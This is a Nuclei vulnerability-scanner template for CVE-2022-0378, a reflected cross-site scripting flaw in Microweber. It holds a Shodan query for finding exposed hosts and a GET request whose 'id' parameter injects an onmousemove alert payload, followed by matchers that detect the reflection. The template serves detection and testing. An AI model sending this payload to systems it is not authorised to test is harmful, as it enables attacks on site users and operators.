nuclei-templates/http/cves/2022/CVE-2022-0378.yaml

46 lines
1.6 KiB
YAML

id: CVE-2022-0378
info:
name: Microweber Cross-Site Scripting
author: pikpikcu
severity: medium
description: Microweber contains a reflected cross-site scripting in Packagist microweber/microweber prior to 1.2.11.
remediation: |
Apply the latest security patch or upgrade to a version that has addressed the vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-0378
- https://github.com/microweber/microweber/commit/fc7e1a026735b93f0e0047700d08c44954fce9ce
- https://huntr.dev/bounties/529b65c0-5be7-49d4-9419-f905b8153d31
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-0378
cwe-id: CWE-79
epss-score: 0.001
epss-percentile: 0.4108
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: microweber
product: microweber
shodan-query: http.favicon.hash:780351152
tags: cve,cve2022,microweber,xss,huntr
http:
- method: GET
path:
- '{{BaseURL}}/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'mwui_init'
- 'onmousemove="alert(document.domain)'
condition: and
- type: status
status:
- 200
# digest: 490a004630440220432d7ad90631fc7d6adfea4a3b198a2015cd9f12ceecf765a09451dd33984daa02200ceaec194f6bf44c0f19dccc953f34829e6aa8f2d9518a871f93b2cdc792b95b:922c64590222798bb761d5b6d8e72950